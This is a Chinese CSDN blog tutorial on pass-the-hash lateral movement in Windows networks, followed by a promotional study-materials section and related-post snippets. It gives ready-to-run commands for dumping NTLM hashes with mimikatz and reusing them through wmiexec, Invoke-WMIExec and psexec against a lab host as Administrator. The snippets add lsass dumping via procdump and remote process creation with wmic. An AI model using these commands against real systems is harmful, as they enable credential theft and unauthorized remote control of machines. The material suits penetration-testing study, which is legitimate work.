哈希传递常用方法_hash传递工具(1)

于 2024-05-14 04:48:15 发布
阅读量749 收藏 14
点赞数 22
分类专栏: 程序员 文章标签: 哈希算法 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84972799/article/details/138831739
版权

前言

随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。

135端口WMI哈希传递

WMI 全称 Windows Management Instrumentation 即 Windows 管理工具, Windows 98 以后的操作系统都支持 WMI。以下使用Windows7系统演示。

首先在Windows7虚拟机上使用mimikatz工具提取出管理员密码哈希值,在物理机使用wmiexec工具进行连接,此处使用Windows版本wmiexec。注意只允许RID为500的账户才能传递不然会提示rpc_s_access_denied

wmiexec

在这里插入图片描述
如果只获取到NThash,LMhash部分可使用32个0替代。

wmiexec.exe -hashes 00000000000000000000000000000000:087c5f34c0bc3d2d3f6f6dbba9f4cd92 Administrator@10.50.10.157

在这里插入图片描述

Invoke-WMIExec.ps1

还可以使用ps的哈希传递脚本,我这里直接导入了Invoke-WMIExec.ps1

Invoke-WMIExec -Target 10.50.10.157 -Username Administrator -hash 00000000000000000000000000000000:087c5f34c0bc3d2d3f6f6dbba9f4cd92 -Command "whoami" -Verbose

在这里插入图片描述

445端口smb哈希传递

psexec
psexec.exe -hashes 00000000000000000000000000000000:087c5f34c0bc3d2d3f6f6dbba9f4cd92 Administrator@10.50.10.157

在这里插入图片描述

mmcexec

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

/topics/618653875)

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84972799
关注
  • 22
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
115_使用 CrackMapExec 进行 NTLM Hash 传递攻击1
08-03
综上所述,这篇内容涵盖了NTLM身份验证的工作原理、NTLM Hash传递攻击的概念、CrackMapExec工具的功能及其在渗透测试中的应用,以及如何使用Mimikatz来获取NTLM Hash。这些知识对于理解网络安全、防御NTLM Hash传递...
哈希传递常用方法
路虽远,行将至。事虽难,做必达。
05-13 577
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。
python wmiexec_impacket远程命令执行记录
weixin_39605840的博客
12-22 1829
impacket远程命令执行记录在横向移动的时候常常会遇到目标445端口被防火墙过滤的情况,那么我们就需要通过其他端口进行横向移动。之前对impacket中远程命令执行的帮助文件看的不是很透彻,导致掉坑里。wmiexec&dcomexec正常我们使用wmiexec、dcomexec的时候,命令会这样写,会回显执行结果。这时wmiexec、dcomexec会使用135、445端口,但如果目标...
内网安全-域横向smb&wmi明文或hash传递
xhscxj的博客
03-11 3822
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(path,ptk等)进行移动 2.利用其他服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第三方平台(Hachcat)进行破解获取 ...
内网横向常用手法
weixin_56606020的博客
08-24 1913
内网横向手法
Windows NTLM HashHash传递、Key传递攻击
weixin_30563917的博客
07-04 2020
Hash(Key) 获取 工具: Mimikatz 用法: .\mimikatz.exe privilege::debug #查看权限 sekurlsa::logonpasswords #获取hash和明文密码(如果可以的话) sekurlsa::ekeys #获取kerberos加密凭证 Hash(Key)传递 Mimikatz sekurlsa::pth /user:xxxxxxx...
hashpass-android:Android 的哈希传递实现
07-04
在Android平台上实现哈希传递的库,如`hashpass-android`,可以帮助开发者为用户提供更加安全的密码管理体验。这个库是与Stephan Boyer的Chrome插件完全兼容的,意味着Android应用可以利用相同的安全机制来生成和...
分布式哈希表(Distributed Hash Table DHT)1
08-03
分布式哈希表(DHT,Distributed Hash Table)是一种用于分布式环境的数据存储技术,它将数据分布在网络中的多个节点上,以实现高效、可扩展的数据管理和检索。DHT的设计目标是提供一种全局一致性的哈希函数,使得...
哈希传递指导:用于实施哈希传递缓解措施的配置指南。 #nsacyber
02-06
哈希传递(Pass-the-Hash,PTH)是一种网络安全攻击手段,攻击者在获取了目标系统的NTLM哈希后,可以不需知道原始密码就能在该网络内其他系统上进行身份验证,从而控制系统。这种攻击方式对Windows环境尤其具有威胁...
渗透技巧_Pass_the_Hash_with_Exchange_Web_Service1
08-03
【渗透技巧_Pass_the_Hash_with_Exchange_Web_Service1】这篇文章主要讲解了如何通过Exchange Web Service (EWS)利用NTLM Hash进行无密码登录的渗透测试技术,即Pass the Hash攻击的一种变种。Pass the Hash是一种...
哈希传递攻击
越努力 越自由
05-05 1501
​ 目标计算机间如果开启了默认共享又关闭了防火墙,我们如果知道它的用户名和密码,则可以进行ipc$连接。其原理是基于ntlm网络认证。但是ipc$连接需要明文的密码,假如我们只获取了密码的hash值解不出明文,该怎么连接了?此时我们可以进行hash传递(Pass-the-Hash),即输入账号和hash值,进行连接 ​
内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递
网络安全领域___专研者.
06-09 2996
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)
第15篇:内网横向中windows各端口远程登录哈希传递方法总结
ABC_123的博客
06-09 3284
Part1 前言随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......
WMIC使用
越努力 越自由
11-15 5819
远程创建进程 如下,以administrator用户连接192.168.52.140,并在机器上创建一个进程执行ipconfig命令,将结果写入c:\result.txt文本文件中:(由于wmic执行远程命令没有回显,所以要将结果写入到txt中) wmic /node:192.168.52.140 /user:administrator /password:123.com process call create "cmd.exe /c ipconfig > c:\result.txt...
内网渗透总结三:第三步利用明文或者hash进行横向移动
yggcwhat
05-06 1249
内网渗透总结三:第三步利用明文或者hash进行横向移动
内网渗透-域横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1772
工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
内网渗透-哈希传递
qq_45953122的博客
10-18 410
哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、LM Hash都不需要明文密码,因此都可以被称为Hash传递攻击。
内网渗透--哈希传递
最新发布
m0_62202418的博客
11-28 1110
NTLM 协议主要用于在 Windows 网络环境中对用户进行身份验证,并且在许多企业网络中被广泛采用。哈希传递是能够在不需要账号明文密码的情况下完成认证的一个技术,比如NTLM Hash、 LM Hash都不需要明文密码因此都可以被称为Hash传递攻击。早期SMB协议明文在网络上传输数据,后来诞生了LM验证机制,LM机制由于过于简单,微软提出了WindowsNT挑战/响应机制,这就是NTLM。4.sekurlsa::logonpasswords ,获取内存中保存的登录信息。/ntlm:获取的NTLM。
内网渗透——哈希传递
来日可期的博客
10-09 1300
哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值